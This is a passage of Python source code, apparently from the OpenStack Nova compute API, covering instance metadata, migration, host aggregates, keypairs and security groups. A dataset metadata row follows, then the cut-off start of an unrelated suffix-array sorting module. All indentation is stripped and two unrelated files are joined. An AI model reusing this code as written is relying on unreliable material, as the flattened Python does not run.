for (k, v) in input_metadata.iteritems():
# Both keys and values filters defined -- AND
if ((keys_filter and values_filter) and
not _match_any(keys_filter, k) and
not _match_any(values_filter, v)):
continue
# Only keys or values filters are defined
elif ((keys_filter and not _match_any(keys_filter, k)) or
(values_filter and not _match_any(values_filter, v))):
continue
output_metadata[k] = v
return output_metadata
formatted_metadata_list = []
instances = self._get_instances_by_filters(context, filters={},
sort_key='created_at',
sort_dir='desc')
for instance in instances:
try:
check_policy(context, 'get_all_instance_%s' % metadata_type,
instance)
metadata = instance.get(metadata_type, {})
for filt in search_filts:
# By chaining the input to the output, the filters are
# ANDed together
metadata = _filter_metadata(instance, filt, metadata)
for (k, v) in metadata.iteritems():
formatted_metadata_list.append({'key': k, 'value': v,
'instance_id': instance.get('uuid')})
except exception.PolicyNotAuthorized:
# failed policy check - not allowed to
# read this metadata
continue
return formatted_metadata_list
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.SUSPENDED, vm_states.STOPPED],
task_state=None)
def delete_instance_metadata(self, context, instance, key):
"""Delete the given metadata item from an instance."""
instance.delete_metadata_key(key)
self.compute_rpcapi.change_instance_metadata(context,
instance=instance,
diff={key: ['-']})
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.SUSPENDED, vm_states.STOPPED],
task_state=None)
def update_instance_metadata(self, context, instance,
metadata, delete=False):
"""Updates or creates instance metadata.
If delete is True, metadata items that are not specified in the
`metadata` argument will be deleted.
"""
orig = dict(instance.metadata)
if delete:
_metadata = metadata
else:
_metadata = dict(instance.metadata)
_metadata.update(metadata)
self._check_metadata_properties_quota(context, _metadata)
instance.metadata = _metadata
instance.save()
diff = _diff_dict(orig, instance.metadata)
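# The diff sent to the compute host appears to use the same convention
# as delete_instance_metadata above: removed keys map to ['-'], while
# added or changed keys presumably map to ['+', <new value>]. This is an
# inference from the surrounding code, not a documented contract.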
self.compute_rpcapi.change_instance_metadata(context,
instance=instance,
diff=diff)
return _metadata
def get_instance_faults(self, context, instances):
"""Get all faults for a list of instance uuids."""
if not instances:
return {}
for instance in instances:
check_policy(context, 'get_instance_faults', instance)
uuids = [instance['uuid'] for instance in instances]
return self.db.instance_fault_get_by_instance_uuids(context, uuids)
def is_volume_backed_instance(self, context, instance, bdms=None):
if not instance['image_ref']:
return True
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
root_bdm = bdms.root_bdm()
if not root_bdm:
return False
return root_bdm.is_volume
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def live_migrate(self, context, instance, block_migration,
disk_over_commit, host_name):
"""Migrate a server lively to a new host."""
LOG.debug("Going to try to live migrate instance to %s",
host_name or "another host", instance=instance)
instance.task_state = task_states.MIGRATING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance,
instance_actions.LIVE_MIGRATION)
self.compute_task_api.live_migrate_instance(context, instance,
host_name, block_migration=block_migration,
disk_over_commit=disk_over_commit)
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.ERROR])
def evacuate(self, context, instance, host, on_shared_storage,
admin_password=None):
"""Running evacuate to target host.
Checking vm compute host state, if the host not in expected_state,
raising an exception.
:param instance: The instance to evacuate
:param host: Target host. if not set, the scheduler will pick up one
:param on_shared_storage: True if instance files on shared storage
:param admin_password: password to set on rebuilt instance
"""
LOG.debug('vm evacuation scheduled', instance=instance)
inst_host = instance.host
service = objects.Service.get_by_compute_host(context, inst_host)
if self.servicegroup_api.service_is_up(service):
msg = (_('Instance compute service state on %s '
'expected to be down, but it was up.') % inst_host)
LOG.error(msg)
raise exception.ComputeServiceInUse(host=inst_host)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.EVACUATE)
return self.compute_task_api.rebuild_instance(context,
instance=instance,
new_pass=admin_password,
injected_files=None,
image_ref=None,
orig_image_ref=None,
orig_sys_metadata=None,
bdms=None,
recreate=True,
on_shared_storage=on_shared_storage,
host=host)
def get_migrations(self, context, filters):
"""Get all migrations for the given filters."""
return objects.MigrationList.get_by_filters(context, filters)
@wrap_check_policy
def volume_snapshot_create(self, context, volume_id, create_info):
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id, expected_attrs=['instance'])
self.compute_rpcapi.volume_snapshot_create(context, bdm.instance,
volume_id, create_info)
snapshot = {
'snapshot': {
'id': create_info.get('id'),
'volumeId': volume_id
}
}
return snapshot
@wrap_check_policy
def volume_snapshot_delete(self, context, volume_id, snapshot_id,
delete_info):
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id, expected_attrs=['instance'])
self.compute_rpcapi.volume_snapshot_delete(context, bdm.instance,
volume_id, snapshot_id, delete_info)
def external_instance_event(self, context, instances, events):
# NOTE(danms): The external API consumer just provides events,
# but doesn't know where they go. We need to collate lists
# by the host the affected instance is on and dispatch them
# according to host
instances_by_host = {}
events_by_host = {}
hosts_by_instance = {}
for instance in instances:
instances_on_host = instances_by_host.get(instance.host, [])
instances_on_host.append(instance)
instances_by_host[instance.host] = instances_on_host
hosts_by_instance[instance.uuid] = instance.host
for event in events:
host = hosts_by_instance[event.instance_uuid]
events_on_host = events_by_host.get(host, [])
events_on_host.append(event)
events_by_host[host] = events_on_host
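# Sketch of the grouping above (hypothetical data): two instances on
# host 'compute1' and one on 'compute2' produce
# instances_by_host = {'compute1': [i1, i2], 'compute2': [i3]}, and each
# event is appended to events_by_host under its instance's host, so the
# loop below makes one RPC call per host with the matching batches.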
for host in instances_by_host:
# TODO(salv-orlando): Handle exceptions raised by the rpc api layer
# in order to ensure that a failure in processing events on a host
# will not prevent processing events on other hosts
self.compute_rpcapi.external_instance_event(
context, instances_by_host[host], events_by_host[host])
class HostAPI(base.Base):
"""Sub-set of the Compute Manager API for managing host operations."""
def __init__(self, rpcapi=None):
self.rpcapi = rpcapi or compute_rpcapi.ComputeAPI()
self.servicegroup_api = servicegroup.API()
super(HostAPI, self).__init__()
def _assert_host_exists(self, context, host_name, must_be_up=False):
"""Raise HostNotFound if compute host doesn't exist."""
service = objects.Service.get_by_compute_host(context, host_name)
if not service:
raise exception.HostNotFound(host=host_name)
if must_be_up and not self.servicegroup_api.service_is_up(service):
raise exception.ComputeServiceUnavailable(host=host_name)
return service['host']
@wrap_exception()
def set_host_enabled(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances."""
host_name = self._assert_host_exists(context, host_name)
payload = {'host_name': host_name, 'enabled': enabled}
compute_utils.notify_about_host_update(context,
'set_enabled.start',
payload)
result = self.rpcapi.set_host_enabled(context, enabled=enabled,
host=host_name)
compute_utils.notify_about_host_update(context,
'set_enabled.end',
payload)
return result
def get_host_uptime(self, context, host_name):
"""Returns the result of calling "uptime" on the target host."""
host_name = self._assert_host_exists(context, host_name,
must_be_up=True)
return self.rpcapi.get_host_uptime(context, host=host_name)
@wrap_exception()
def host_power_action(self, context, host_name, action):
"""Reboots, shuts down or powers up the host."""
host_name = self._assert_host_exists(context, host_name)
payload = {'host_name': host_name, 'action': action}
compute_utils.notify_about_host_update(context,
'power_action.start',
payload)
result = self.rpcapi.host_power_action(context, action=action,
host=host_name)
compute_utils.notify_about_host_update(context,
'power_action.end',
payload)
return result
@wrap_exception()
def set_host_maintenance(self, context, host_name, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VM evacuation.
"""
host_name = self._assert_host_exists(context, host_name)
payload = {'host_name': host_name, 'mode': mode}
compute_utils.notify_about_host_update(context,
'set_maintenance.start',
payload)
result = self.rpcapi.host_maintenance_mode(context,
host_param=host_name, mode=mode, host=host_name)
compute_utils.notify_about_host_update(context,
'set_maintenance.end',
payload)
return result
def service_get_all(self, context, filters=None, set_zones=False):
"""Returns a list of services, optionally filtering the results.
If specified, 'filters' should be a dictionary containing service
attributes and matching values. I.e., to get a list of services for
the 'compute' topic, use filters={'topic': 'compute'}.
"""
if filters is None:
filters = {}
disabled = filters.pop('disabled', None)
if 'availability_zone' in filters:
set_zones = True
services = objects.ServiceList.get_all(context, disabled,
set_zones=set_zones)
ret_services = []
for service in services:
for key, val in filters.iteritems():
if service[key] != val:
break
else:
# All filters matched.
ret_services.append(service)
return ret_services
def service_get_by_compute_host(self, context, host_name):
"""Get service entry for the given compute hostname."""
return objects.Service.get_by_compute_host(context, host_name)
def service_update(self, context, host_name, binary, params_to_update):
"""Enable / Disable a service.
For compute services, this stops new builds and migrations going to
the host.
"""
service = objects.Service.get_by_args(context, host_name, binary)
service.update(params_to_update)
service.save()
return service
def service_delete(self, context, service_id):
"""Deletes the specified service."""
objects.Service.get_by_id(context, service_id).destroy()
def instance_get_all_by_host(self, context, host_name):
"""Return all instances on the given host."""
return self.db.instance_get_all_by_host(context, host_name)
def task_log_get_all(self, context, task_name, period_beginning,
period_ending, host=None, state=None):
"""Return the task logs within a given range, optionally
filtering by host and/or state.
"""
return self.db.task_log_get_all(context, task_name,
period_beginning,
period_ending,
host=host,
state=state)
def compute_node_get(self, context, compute_id):
"""Return compute node entry for particular integer ID."""
return self.db.compute_node_get(context, int(compute_id))
def compute_node_get_all(self, context):
return self.db.compute_node_get_all(context)
def compute_node_search_by_hypervisor(self, context, hypervisor_match):
return self.db.compute_node_search_by_hypervisor(context,
hypervisor_match)
def compute_node_statistics(self, context):
return self.db.compute_node_statistics(context)
class InstanceActionAPI(base.Base):
"""Sub-set of the Compute Manager API for managing instance actions."""
def actions_get(self, context, instance):
return objects.InstanceActionList.get_by_instance_uuid(
context, instance['uuid'])
def action_get_by_request_id(self, context, instance, request_id):
return objects.InstanceAction.get_by_request_id(
context, instance['uuid'], request_id)
def action_events_get(self, context, instance, action_id):
return objects.InstanceActionEventList.get_by_action(
context, action_id)
class AggregateAPI(base.Base):
"""Sub-set of the Compute Manager API for managing host aggregates."""
def __init__(self, **kwargs):
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
super(AggregateAPI, self).__init__(**kwargs)
@wrap_exception()
def create_aggregate(self, context, aggregate_name, availability_zone):
"""Creates the model for the aggregate."""
aggregate = objects.Aggregate()
aggregate.name = aggregate_name
if availability_zone:
aggregate.metadata = {'availability_zone': availability_zone}
aggregate.create(context)
return aggregate
def get_aggregate(self, context, aggregate_id):
"""Get an aggregate by id."""
return objects.Aggregate.get_by_id(context, aggregate_id)
def get_aggregate_list(self, context):
"""Get all the aggregates."""
return objects.AggregateList.get_all(context)
@wrap_exception()
def update_aggregate(self, context, aggregate_id, values):
"""Update the properties of an aggregate."""
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
if 'name' in values:
aggregate.name = values.pop('name')
aggregate.save()
self.is_safe_to_update_az(context, values, aggregate=aggregate,
action_name="update_aggregate")
if values:
aggregate.update_metadata(values)
# If the updated values include availability_zone, then the cache
# which stores availability_zones and hosts needs to be reset
if values.get('availability_zone'):
availability_zones.reset_cache()
return aggregate
@wrap_exception()
def update_aggregate_metadata(self, context, aggregate_id, metadata):
"""Updates the aggregate metadata."""
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
self.is_safe_to_update_az(context, metadata, aggregate=aggregate,
action_name="update_aggregate_metadata")
aggregate.update_metadata(metadata)
        # If the updated metadata includes availability_zone, the cache that
        # stores availability zones and hosts needs to be reset
if metadata and metadata.get('availability_zone'):
availability_zones.reset_cache()
return aggregate
@wrap_exception()
def delete_aggregate(self, context, aggregate_id):
"""Deletes the aggregate."""
aggregate_payload = {'aggregate_id': aggregate_id}
compute_utils.notify_about_aggregate_update(context,
"delete.start",
aggregate_payload)
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
if len(aggregate.hosts) > 0:
msg = _("Host aggregate is not empty")
raise exception.InvalidAggregateAction(action='delete',
aggregate_id=aggregate_id,
reason=msg)
aggregate.destroy()
compute_utils.notify_about_aggregate_update(context,
"delete.end",
aggregate_payload)
def is_safe_to_update_az(self, context, metadata, aggregate,
hosts=None, action_name="add_host_to_aggregate"):
"""Determine if updates alter an aggregate's availability zone.
:param context: local context
:param metadata: Target metadata for updating aggregate
:param aggregate: Aggregate to update
:param hosts: Hosts to check. If None, aggregate.hosts is used
:type hosts: list
        :param action_name: Calling method for logging purposes
"""
if 'availability_zone' in metadata:
_hosts = hosts or aggregate.hosts
zones, not_zones = availability_zones.get_availability_zones(
context, with_hosts=True)
for host in _hosts:
# NOTE(sbauza): Host can only be in one AZ, so let's take only
# the first element
host_azs = [az for (az, az_hosts) in zones
if host in az_hosts
and az != CONF.internal_service_availability_zone]
host_az = host_azs.pop()
if host_azs:
LOG.warning(_("More than 1 AZ for host %s"), host)
if host_az == CONF.default_availability_zone:
# NOTE(sbauza): Aggregate with AZ set to default AZ can
# exist, we need to check
host_aggs = objects.AggregateList.get_by_host(
context, host, key='availability_zone')
default_aggs = [agg for agg in host_aggs
if agg['metadata'].get(
'availability_zone'
) == CONF.default_availability_zone]
else:
default_aggs = []
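                # Flag a conflict only when the host's current AZ differs from
                # this aggregate's AZ and that AZ is either a non-default zone
                # or one explicitly set on another of the host's aggregates.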
if (host_az != aggregate.metadata.get('availability_zone') and
(host_az != CONF.default_availability_zone or
len(default_aggs) != 0)):
self._check_az_for_host(
metadata, host_az, aggregate.id,
action_name=action_name)
def _check_az_for_host(self, aggregate_meta, host_az, aggregate_id,
action_name="add_host_to_aggregate"):
# NOTE(mtreinish) The availability_zone key returns a set of
# zones so loop over each zone. However there should only
# ever be one zone in the set because an aggregate can only
# have a single availability zone set at one time.
if isinstance(aggregate_meta["availability_zone"], six.string_types):
azs = set([aggregate_meta["availability_zone"]])
else:
azs = aggregate_meta["availability_zone"]
for aggregate_az in azs:
            # NOTE(mtreinish) Ensure that the aggregate_az is not None;
            # if it is None then that is just a regular aggregate and
            # it is valid to have a host in multiple aggregates.
if aggregate_az and aggregate_az != host_az:
msg = _("Host already in availability zone "
"%s") % host_az
raise exception.InvalidAggregateAction(
action=action_name, aggregate_id=aggregate_id,
reason=msg)
def _update_az_cache_for_host(self, context, host_name, aggregate_meta):
        # Update the availability_zone cache to avoid returning a stale
        # availability_zone during the cache retention window when a host
        # is added to or removed from an aggregate.
if aggregate_meta and aggregate_meta.get('availability_zone'):
availability_zones.update_host_availability_zone_cache(context,
host_name)
@wrap_exception()
def add_host_to_aggregate(self, context, aggregate_id, host_name):
"""Adds the host to an aggregate."""
aggregate_payload = {'aggregate_id': aggregate_id,
'host_name': host_name}
compute_utils.notify_about_aggregate_update(context,
"addhost.start",
aggregate_payload)
# validates the host; ComputeHostNotFound is raised if invalid
objects.Service.get_by_compute_host(context, host_name)
metadata = self.db.aggregate_metadata_get_by_metadata_key(
context, aggregate_id, 'availability_zone')
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
self.is_safe_to_update_az(context, metadata, hosts=[host_name],
aggregate=aggregate)
aggregate.add_host(context, host_name)
self._update_az_cache_for_host(context, host_name, aggregate.metadata)
# NOTE(jogo): Send message to host to support resource pools
self.compute_rpcapi.add_aggregate_host(context,
aggregate=aggregate, host_param=host_name, host=host_name)
aggregate_payload.update({'name': aggregate['name']})
compute_utils.notify_about_aggregate_update(context,
"addhost.end",
aggregate_payload)
return aggregate
@wrap_exception()
def remove_host_from_aggregate(self, context, aggregate_id, host_name):
"""Removes host from the aggregate."""
aggregate_payload = {'aggregate_id': aggregate_id,
'host_name': host_name}
compute_utils.notify_about_aggregate_update(context,
"removehost.start",
aggregate_payload)
# validates the host; ComputeHostNotFound is raised if invalid
objects.Service.get_by_compute_host(context, host_name)
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
aggregate.delete_host(host_name)
self._update_az_cache_for_host(context, host_name, aggregate.metadata)
self.compute_rpcapi.remove_aggregate_host(context,
aggregate=aggregate, host_param=host_name, host=host_name)
compute_utils.notify_about_aggregate_update(context,
"removehost.end",
aggregate_payload)
return aggregate
class KeypairAPI(base.Base):
"""Subset of the Compute Manager API for managing key pairs."""
get_notifier = functools.partial(rpc.get_notifier, service='api')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
def _notify(self, context, event_suffix, keypair_name):
payload = {
'tenant_id': context.project_id,
'user_id': context.user_id,
'key_name': keypair_name,
}
notify = self.get_notifier()
notify.info(context, 'keypair.%s' % event_suffix, payload)
def _validate_new_key_pair(self, context, user_id, key_name):
safe_chars = "_- " + string.digits + string.ascii_letters
clean_value = "".join(x for x in key_name if x in safe_chars)
if clean_value != key_name:
raise exception.InvalidKeypair(
reason=_("Keypair name contains unsafe characters"))
try:
utils.check_string_length(key_name, min_length=1, max_length=255)
except exception.InvalidInput:
raise exception.InvalidKeypair(
reason=_('Keypair name must be string and between '
'1 and 255 characters long'))
count = QUOTAS.count(context, 'key_pairs', user_id)
try:
QUOTAS.limit_check(context, key_pairs=count + 1)
except exception.OverQuota:
raise exception.KeypairLimitExceeded()
@wrap_exception()
def import_key_pair(self, context, user_id, key_name, public_key):
"""Import a key pair using an existing public key."""
self._validate_new_key_pair(context, user_id, key_name)
self._notify(context, 'import.start', key_name)
fingerprint = crypto.generate_fingerprint(public_key)
keypair = objects.KeyPair(context)
keypair.user_id = user_id
keypair.name = key_name
keypair.fingerprint = fingerprint
keypair.public_key = public_key
keypair.create()
self._notify(context, 'import.end', key_name)
return keypair
@wrap_exception()
def create_key_pair(self, context, user_id, key_name):
"""Create a new key pair."""
self._validate_new_key_pair(context, user_id, key_name)
self._notify(context, 'create.start', key_name)
private_key, public_key, fingerprint = crypto.generate_key_pair()
keypair = objects.KeyPair(context)
keypair.user_id = user_id
keypair.name = key_name
keypair.fingerprint = fingerprint
keypair.public_key = public_key
keypair.create()
self._notify(context, 'create.end', key_name)
return keypair, private_key
@wrap_exception()
def delete_key_pair(self, context, user_id, key_name):
"""Delete a keypair by name."""
self._notify(context, 'delete.start', key_name)
objects.KeyPair.destroy_by_name(context, user_id, key_name)
self._notify(context, 'delete.end', key_name)
def get_key_pairs(self, context, user_id):
"""List key pairs."""
return objects.KeyPairList.get_by_user(context, user_id)
def get_key_pair(self, context, user_id, key_name):
"""Get a keypair by name."""
return objects.KeyPair.get_by_name(context, user_id, key_name)
class SecurityGroupAPI(base.Base, security_group_base.SecurityGroupBase):
"""Sub-set of the Compute API related to managing security groups
and security group rules
"""
# The nova security group api does not use a uuid for the id.
id_is_uuid = False
def __init__(self, **kwargs):
super(SecurityGroupAPI, self).__init__(**kwargs)
self.security_group_rpcapi = compute_rpcapi.SecurityGroupAPI()
def validate_property(self, value, property, allowed):
"""Validate given security group property.
:param value: the value to validate, as a string or unicode
:param property: the property, either 'name' or 'description'
:param allowed: the range of characters allowed
"""
try:
val = value.strip()
except AttributeError:
msg = _("Security group %s is not a string or unicode") % property
self.raise_invalid_property(msg)
utils.check_string_length(val, name=property, min_length=1,
max_length=255)
if allowed and not re.match(allowed, val):
# Some validation to ensure that values match API spec.
# - Alphanumeric characters, spaces, dashes, and underscores.
# TODO(Daviey): LP: #813685 extend beyond group_name checking, and
# probably create a param validator that can be used elsewhere.
msg = (_("Value (%(value)s) for parameter Group%(property)s is "
"invalid. Content limited to '%(allowed)s'.") %
{'value': value, 'allowed': allowed,
'property': property.capitalize()})
self.raise_invalid_property(msg)
def ensure_default(self, context):
"""Ensure that a context has a security group.
Creates a security group for the security context if it does not
already exist.
:param context: the security context
"""
self.db.security_group_ensure_default(context)
def create_security_group(self, context, name, description):
try:
reservations = QUOTAS.reserve(context, security_groups=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many security groups.")
self.raise_over_quota(msg)
LOG.audit(_("Create Security Group %s"), name, context=context)
try:
self.ensure_default(context)
group = {'user_id': context.user_id,
'project_id': context.project_id,
'name': name,
'description': description}
try:
group_ref = self.db.security_group_create(context, group)
except exception.SecurityGroupExists:
msg = _('Security group %s already exists') % name
self.raise_group_already_exists(msg)
# Commit the reservation
QUOTAS.commit(context, reservations)
except Exception:
with excutils.save_and_reraise_exception():
QUOTAS.rollback(context, reservations)
return group_ref
def update_security_group(self, context, security_group,
name, description):
if security_group['name'] in RO_SECURITY_GROUPS:
msg = (_("Unable to update system group '%s'") %
security_group['name'])
self.raise_invalid_group(msg)
group = {'name': name,
'description': description}
columns_to_join = ['rules.grantee_group']
group_ref = self.db.security_group_update(context,
security_group['id'],
group,
columns_to_join=columns_to_join)
return group_ref
def get(self, context, name=None, id=None, map_exception=False):
self.ensure_default(context)
try:
if name:
return self.db.security_group_get_by_name(context,
context.project_id,
name)
elif id:
return self.db.security_group_get(context, id)
except exception.NotFound as exp:
if map_exception:
msg = exp.format_message()
self.raise_not_found(msg)
else:
raise
def list(self, context, names=None, ids=None, project=None,
search_opts=None):
self.ensure_default(context)
groups = []
if names or ids:
if names:
for name in names:
groups.append(self.db.security_group_get_by_name(context,
project,
name))
if ids:
for id in ids:
groups.append(self.db.security_group_get(context, id))
elif context.is_admin:
# TODO(eglynn): support a wider set of search options than just
# all_tenants, at least include the standard filters defined for
# the EC2 DescribeSecurityGroups API for the non-admin case also
if (search_opts and 'all_tenants' in search_opts):
groups = self.db.security_group_get_all(context)
else:
groups = self.db.security_group_get_by_project(context,
project)
elif project:
groups = self.db.security_group_get_by_project(context, project)
return groups
def destroy(self, context, security_group):
if security_group['name'] in RO_SECURITY_GROUPS:
msg = _("Unable to delete system group '%s'") % \
security_group['name']
self.raise_invalid_group(msg)
if self.db.security_group_in_use(context, security_group['id']):
msg = _("Security group is still in use")
self.raise_invalid_group(msg)
quotas = objects.Quotas()
quota_project, quota_user = quotas_obj.ids_from_security_group(
context, security_group)
try:
quotas.reserve(context, project_id=quota_project,
user_id=quota_user, security_groups=-1)
except Exception:
LOG.exception(_LE("Failed to update usages deallocating "
"security group"))
LOG.audit(_("Delete security group %s"), security_group['name'],
context=context)
self.db.security_group_destroy(context, security_group['id'])
# Commit the reservations
quotas.commit()
def is_associated_with_server(self, security_group, instance_uuid):
"""Check if the security group is already associated
with the instance. If Yes, return True.
"""
if not security_group:
return False
instances = security_group.get('instances')
if not instances:
return False
for inst in instances:
if (instance_uuid == inst['uuid']):
return True
return False
@wrap_check_security_groups_policy
def add_to_instance(self, context, instance, security_group_name):
"""Add security group to the instance."""
security_group = self.db.security_group_get_by_name(context,
context.project_id,
security_group_name)
instance_uuid = instance['uuid']
# check if the security group is associated with the server
if self.is_associated_with_server(security_group, instance_uuid):
raise exception.SecurityGroupExistsForInstance(
security_group_id=security_group['id'],
instance_id=instance_uuid)
self.db.instance_add_security_group(context.elevated(),
instance_uuid,
security_group['id'])
# NOTE(comstud): No instance_uuid argument to this compute manager
# call
self.security_group_rpcapi.refresh_security_group_rules(context,
security_group['id'], host=instance['host'])
@wrap_check_security_groups_policy
def remove_from_instance(self, context, instance, security_group_name):
"""Remove the security group associated with the instance."""
security_group = self.db.security_group_get_by_name(context,
context.project_id,
security_group_name)
instance_uuid = instance['uuid']
# check if the security group is associated with the server
if not self.is_associated_with_server(security_group, instance_uuid):
raise exception.SecurityGroupNotExistsForInstance(
security_group_id=security_group['id'],
instance_id=instance_uuid)
self.db.instance_remove_security_group(context.elevated(),
instance_uuid,
security_group['id'])
# NOTE(comstud): No instance_uuid argument to this compute manager
# call
self.security_group_rpcapi.refresh_security_group_rules(context,
security_group['id'], host=instance['host'])
def get_rule(self, context, id):
self.ensure_default(context)
try:
return self.db.security_group_rule_get(context, id)
except exception.NotFound:
msg = _("Rule (%s) not found") % id
self.raise_not_found(msg)
def add_rules(self, context, id, name, vals):
"""Add security group rule(s) to security group.
Note: the Nova security group API doesn't support adding multiple
security group rules at once but the EC2 one does. Therefore,
this function is written to support both.
"""
count = QUOTAS.count(context, 'security_group_rules', id)
try:
projected = count + len(vals)
QUOTAS.limit_check(context, security_group_rules=projected)
except exception.OverQuota:
msg = _("Quota exceeded, too many security group rules.")
self.raise_over_quota(msg)
msg = _("Security group %(name)s added %(protocol)s ingress "
"(%(from_port)s:%(to_port)s)")
rules = []
for v in vals:
rule = self.db.security_group_rule_create(context, v)
rules.append(rule)
LOG.audit(msg, {'name': name,
'protocol': rule.protocol,
'from_port': rule.from_port,
'to_port': rule.to_port})
self.trigger_rules_refresh(context, id=id)
return rules
def remove_rules(self, context, security_group, rule_ids):
msg = _("Security group %(name)s removed %(protocol)s ingress "
"(%(from_port)s:%(to_port)s)")
for rule_id in rule_ids:
rule = self.get_rule(context, rule_id)
LOG.audit(msg, {'name': security_group['name'],
'protocol': rule.protocol,
'from_port': rule.from_port,
'to_port': rule.to_port})
self.db.security_group_rule_destroy(context, rule_id)
# NOTE(vish): we removed some rules, so refresh
self.trigger_rules_refresh(context, id=security_group['id'])
def remove_default_rules(self, context, rule_ids):
for rule_id in rule_ids:
self.db.security_group_default_rule_destroy(context, rule_id)
def add_default_rules(self, context, vals):
rules = [self.db.security_group_default_rule_create(context, v)
for v in vals]
return rules
def default_rule_exists(self, context, values):
"""Indicates whether the specified rule values are already
defined in the default security group rules.
"""
for rule in self.db.security_group_default_rule_list(context):
keys = ('cidr', 'from_port', 'to_port', 'protocol')
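            # for/else below: the else branch runs only when no field
            # differed, i.e. the candidate rule matches the given values.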
for key in keys:
if rule.get(key) != values.get(key):
break
else:
return rule.get('id') or True
return False
def get_all_default_rules(self, context):
try:
rules = self.db.security_group_default_rule_list(context)
except Exception:
msg = 'cannot get default security group rules'
raise exception.SecurityGroupDefaultRuleNotFound(msg)
return rules
def get_default_rule(self, context, id):
try:
return self.db.security_group_default_rule_get(context, id)
except exception.NotFound:
msg = _("Rule (%s) not found") % id
self.raise_not_found(msg)
def validate_id(self, id):
try:
return int(id)
except ValueError:
msg = _("Security group id should be integer")
self.raise_invalid_property(msg)
def trigger_rules_refresh(self, context, id):
"""Called when a rule is added to or removed from a security_group."""
security_group = self.db.security_group_get(
context, id, columns_to_join=['instances'])
for instance in security_group['instances']:
if instance['host'] is not None:
self.security_group_rpcapi.refresh_instance_security_rules(
context, instance['host'], instance)
def trigger_members_refresh(self, context, group_ids):
"""Called when a security group gains a new or loses a member.
Sends an update request to each compute node for each instance for
which this is relevant.
"""
# First, we get the security group rules that reference these groups as
# the grantee..
security_group_rules = set()
for group_id in group_ids:
security_group_rules.update(
self.db.security_group_rule_get_by_security_group_grantee(
context,
group_id))
# ..then we distill the rules into the groups to which they belong..
security_groups = set()
for rule in security_group_rules:
security_group = self.db.security_group_get(
context, rule['parent_group_id'],
columns_to_join=['instances'])
security_groups.add(security_group)
# ..then we find the instances that are members of these groups..
instances = {}
for security_group in security_groups:
for instance in security_group['instances']:
if instance['uuid'] not in instances:
instances[instance['uuid']] = instance
# ..then we send a request to refresh the rules for each instance.
for instance in instances.values():
if instance['host']:
self.security_group_rpcapi.refresh_instance_security_rules(
context, instance['host'], instance)
def get_instance_security_groups(self, context, instance_uuid,
detailed=False):
if detailed:
return self.db.security_group_get_by_instance(context,
instance_uuid)
instance = objects.Instance(uuid=instance_uuid)
groups = objects.SecurityGroupList.get_by_instance(context, instance)
return [{'name': group.name} for group in groups]
def populate_security_groups(self, instance, security_groups):
if not security_groups:
# Make sure it's an empty list and not None
security_groups = []
instance.security_groups = security_group_obj.make_secgroup_list(
security_groups)
| apache-2.0 | -3,211,940,341,219,386,400 | 42.827224 | 79 | 0.572474 | false |
gnarph/DIRT | utilities/suffix_array/tools_karkkainen_sanders.py | 1 | 4256 | # -*- coding: utf-8 -*-
"""
Originally from https://code.google.com/p/pysuffix/
Used from https://github.com/baiyubin/pysuffix
"""
from array import array
def radix_pass(a, b, r, n, k):
"""
:param a: word to sort
:param b: sorted words
:param r: initial string
:param n: input size
:param k: alphabet size
"""
c = array("i", [0] * (k + 1))
for i in xrange(n):
c[r[a[i]]] += 1
somme = 0
for i in xrange(k + 1):
freq, c[i] = c[i], somme
somme += freq
for i in xrange(n):
b[c[r[a[i]]]] = a[i]
c[r[a[i]]] += 1
def simple_kark_sort(s):
alphabet = [None] + sorted(set(s))
k = len(alphabet)
alphabet_indices = {c: i for i, c in enumerate(alphabet)}
n = len(s)
sa = array('i', [0] * (n + 3))
s = array('i', [alphabet_indices[c] for c in s] + [0] * 3)
kark_sort(s, sa, n, k)
return sa
def kark_sort(to_sort, result, n, alphabet_size):
"""s : word to sort
SA : result
n : len of s
K : alphabet size"""
n0 = (n + 2) / 3
n1 = (n + 1) / 3
n2 = n / 3
n02 = n0 + n2
sa_12 = array('i', [0] * (n02 + 3))
sa_0 = array('i', [0] * n0)
s12 = [i for i in xrange(n + (n0 - n1)) if i % 3]
s12.extend([0] * 3)
s12 = array('i', s12)
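    # Sort the suffixes starting at positions i % 3 != 0 by their first three
    # symbols, using three stable (LSD) radix passes.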
radix_pass(s12, sa_12, to_sort[2:], n02, alphabet_size)
radix_pass(sa_12, s12, to_sort[1:], n02, alphabet_size)
radix_pass(s12, sa_12, to_sort, n02, alphabet_size)
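    # Assign a lexicographic name to each distinct symbol triple; the names
    # form the reduced string used for the recursive call below.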
name = 0
c0, c1, c2 = -1, -1, -1
for i in xrange(n02):
if to_sort[sa_12[i]] != c0 or to_sort[sa_12[i] + 1] != c1 or to_sort[sa_12[i] + 2] != c2:
name += 1
c0 = to_sort[sa_12[i]]
c1 = to_sort[sa_12[i] + 1]
c2 = to_sort[sa_12[i] + 2]
if sa_12[i] % 3 == 1:
s12[sa_12[i] / 3] = name
else:
s12[sa_12[i] / 3 + n0] = name
if name < n02:
kark_sort(s12, sa_12, n02, name + 1)
for i in xrange(n02):
s12[sa_12[i]] = i + 1
else:
for i in xrange(n02):
sa_12[s12[i] - 1] = i
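    # Sort the suffixes starting at positions i % 3 == 0: order them by the
    # rank of the following (mod 1) suffix, then radix-sort on the first symbol.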
